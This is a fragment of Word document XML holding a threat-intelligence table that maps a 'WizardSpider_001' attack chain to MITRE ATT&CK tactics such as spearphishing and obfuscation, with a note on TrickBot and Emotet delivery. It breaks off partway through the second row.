                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2964" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7D1A7322" w14:textId="2DE2072A" w:rsidR="000C5B1A" w:rsidRPr="002D1D50" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>WizardSpider_001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7ABFDAE8" w14:textId="77777777" w:rsidR="000C5B1A" w:rsidRPr="002D1D50" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="629" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="3B544140" w14:textId="7A7C1BE3" w:rsidR="000C5B1A" w:rsidRPr="002D1D50" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="558" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2DE159AA" w14:textId="6F0AC90F" w:rsidR="000C5B1A" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2D3DE45A" w14:textId="09F72AF8" w:rsidR="000C5B1A" w:rsidRPr="002D1D50" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="3A6E2417" w14:textId="77777777" w:rsidR="000C5B1A" w:rsidRPr="002D1D50" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C5B1A" w:rsidRPr="002D1D50" w14:paraId="55EF3A2C" w14:textId="77777777" w:rsidTr="008D17AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="694A84D7" w14:textId="77777777" w:rsidR="000C5B1A" w:rsidRPr="002D1D50" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AD726D6" w14:textId="77777777" w:rsidR="000C5B1A" w:rsidRPr="002D1D50" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AF9CDCF" w14:textId="77777777" w:rsidR="000C5B1A" w:rsidRPr="002D1D50" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C5977F5" w14:textId="77777777" w:rsidR="000C5B1A" w:rsidRPr="002D1D50" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="629" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D37F942" w14:textId="77777777" w:rsidR="000C5B1A" w:rsidRPr="002D1D50" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BEF6235" w14:textId="77777777" w:rsidR="000C5B1A" w:rsidRPr="002D1D50" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F5BD236" w14:textId="0C3BC489" w:rsidR="000C5B1A" w:rsidRPr="002D1D50" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="109C4427" w14:textId="77777777" w:rsidR="000C5B1A" w:rsidRPr="002D1D50" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C5B1A" w:rsidRPr="002D1D50" w14:paraId="133C018F" w14:textId="77777777" w:rsidTr="008D17AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5597980E" w14:textId="77777777" w:rsidR="000C5B1A" w:rsidRPr="002D1D50" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33B12468" w14:textId="77777777" w:rsidR="000C5B1A" w:rsidRPr="002D1D50" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DCE8306" w14:textId="77777777" w:rsidR="000C5B1A" w:rsidRPr="002D1D50" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66853D77" w14:textId="77777777" w:rsidR="000C5B1A" w:rsidRPr="002D1D50" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="629" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="379A1787" w14:textId="65BB5C9D" w:rsidR="000C5B1A" w:rsidRPr="002D1D50" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="029E17EE" w14:textId="0BD028DB" w:rsidR="000C5B1A" w:rsidRPr="002D1D50" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2093F897" w14:textId="67D21C8C" w:rsidR="000C5B1A" w:rsidRPr="002D1D50" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67B48415" w14:textId="77777777" w:rsidR="000C5B1A" w:rsidRPr="002D1D50" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w14:paraId="59C130B2" w14:textId="77777777" w:rsidTr="008D17AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00147BF5" w14:textId="77777777" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CE4118A" w14:textId="77777777" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>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0001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4481A311" w14:textId="77777777" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1566.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Spearphishing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Attachment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C5992AD" w14:textId="211CFF1C" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="00557327" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="629" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5146B478" w14:textId="77777777" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17B1CE8C" w14:textId="389401FC" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="00557327" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="535CC5F9" w14:textId="57B43CF9" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="00557327" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEL/IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2923B41B" w14:textId="70A69DA3" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00557327">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">] </w:t>
            </w:r>
            <w:r w:rsidRPr="000C5B1A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">the initial compromise is performed through </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5B1A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TrickBot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5B1A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">, which is typically distributed either via spam email or, through the use of the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5B1A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Emotet</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5B1A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> (developed and operated by MUMMY </w:t>
            </w:r>
            <w:r w:rsidRPr="000C5B1A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>SPIDER) geo-based download function</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w14:paraId="60320CED" w14:textId="77777777" w:rsidTr="008D17AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="533BA8D4" w14:textId="49B961B1" w:rsidR="000C5B1A" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32C8B5FE" w14:textId="0DC7EC9E" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D3685E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D3685E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D3685E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D3685E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D3685E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58FA971B" w14:textId="1D1BAC9A" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D3685E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D3685E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1027 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D3685E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Obfuscated Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2083CBBD" w14:textId="531B06CE" w:rsidR="000C5B1A" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="629" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06F064A2" w14:textId="77777777" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="558" w:type="dxa"/>
          </w:tcPr>
